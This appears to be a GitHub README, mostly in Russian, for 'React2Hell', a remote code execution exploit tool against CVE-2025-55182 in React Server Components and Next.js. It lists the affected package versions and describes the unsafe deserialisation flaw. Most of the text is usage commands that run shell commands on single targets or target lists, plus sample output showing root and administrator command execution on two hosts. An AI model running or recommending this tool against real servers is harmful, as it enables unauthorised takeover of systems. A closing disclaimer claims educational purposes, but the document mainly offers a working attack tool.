
CVE-2025-55182-advanced-scanner
#React2Hell — Эксплойт CVE-2025-55182
🔥 Эксплойт удалённого выполнения кода (RCE) для Next.js / React Server
█████▄ ▄▄▄▄▄ ▄▄▄ ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ▄▄▄▄▄ ██ ██ ▄▄▄▄▄ ▄▄ ▄▄
██▄▄██▄ ██▄▄ ██▀██ ██▀▀▀ ██ ▄██▀ ██▄▄ ██████ ██▄▄ ██ ██
██ ██ ██▄▄▄ ██▀██ ▀████ ██ ███▄▄ ▄▄▄███ ██ ██ ██▄▄▄ ██▄▄▄ ██▄▄▄
{MAGENTA} Next.js/React Server RCE Exploit — CVE-2025-55182
Author: Ankit Pandey GitHub: https://github.com/ankitspandey07
🚀 React2Shell — Утилита для тестирования безопасности 🚀
════════════════════════════════════════════════════════════════════════
usage: new.py [-h] [-u URL] [-l LIST] -c COMMAND [--proxy PROXY] [--proxy-https PROXY_HTTPS]
React2Hell — это мощный инструмент эксплуатации, предназначенный для тестирования и эксплуатации CVE-2025-55182, критической уязвимости удалённого выполнения кода, затрагивающей Next.js и React Server Actions.
Уязвимость предварительной аутентификации удалённого выполнения кода существует в React Server Components версий 19.0.0, 19.1.0, 19.1.1 и 19.2.0, включая следующие пакеты: react-server-dom-parcel, react-server-dom-turbopack и react-server-dom-webpack. Уязвимый код небезопасно десериализует полезные данные из HTTP-запросов к конечным точкам Server Function.
python Scanner.py -u https://target.com -c "whoami"
python Scanner.py -l urls.txt -c "whoami"
python Scanner.py -u https://target.com -c "whoami" --proxy 127.0.0.1:8080
python Scanner.py -u https://target.com -c "whoami" --proxy-https 127.0.0.1:8080
http://site1.com
https://site2.com
http://192.168.1.10:3000
PS D:\Ankitspandey07\React2Hell> python.exe .\Scanner.py -l .\list.txt -c whoami
█████▄ ▄▄▄▄▄ ▄▄▄ ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ▄▄▄▄▄ ██ ██ ▄▄▄▄▄ ▄▄ ▄▄
██▄▄██▄ ██▄▄ ██▀██ ██▀▀▀ ██ ▄██▀ ██▄▄ ██████ ██▄▄ ██ ██
██ ██ ██▄▄▄ ██▀██ ▀████ ██ ███▄▄ ▄▄▄███ ██ ██ ██▄▄▄ ██▄▄▄ ██▄▄▄
{MAGENTA} Next.js/React Server RCE Exploit — CVE-2025-55182
Author: Ankit Pandey GitHub: https://github.com/ankitspandey07
🚀 React2Shell — Security Testing Utility 🚀
════════════════════════════════════════════════════════════════════════
[+] Loaded 3 targets
════════════════════════════════════════════════════════════════════════
[→] Target: http://evil.com:3113/
[→] Exec: whoami
[✓] VULNERABLE — RCE Successful!
------------------------------------------------------------
root
------------------------------------------------------------
────────────────────────────────────────────────────────────────────────
[→] Target: http://example.lab:2000/
[→] Exec: whoami
[✗] Not vulnerable — Status: 200
────────────────────────────────────────────────────────────────────────
[→] Target: https://tale.lab:3000/
[→] Exec: whoami
[✓] VULNERABLE — RCE Successful!
------------------------------------------------------------
win-1fl835ovldc\\administrator
------------------------------------------------------------
────────────────────────────────────────────────────────────────────────
[✓] Scan complete — Vulnerable: 2
PS D:\Ankitspandey07\React2Hell>
Этот инструмент создан строго для образовательных целей и исследований в области безопасности. Не используйте его в системах без явного разрешения. Вы несёте ответственность за свои действия.
Если этот эксплойт помог вам, подумайте о том, чтобы оставить ⭐ на GitHub ❤️
Ankit Pandey; GitHub: https://github.com/Ankitspandey07
Создано с 🔥 кем-то, кто гордится и увлечён пентестом, кто стремится учиться на каждом шагу.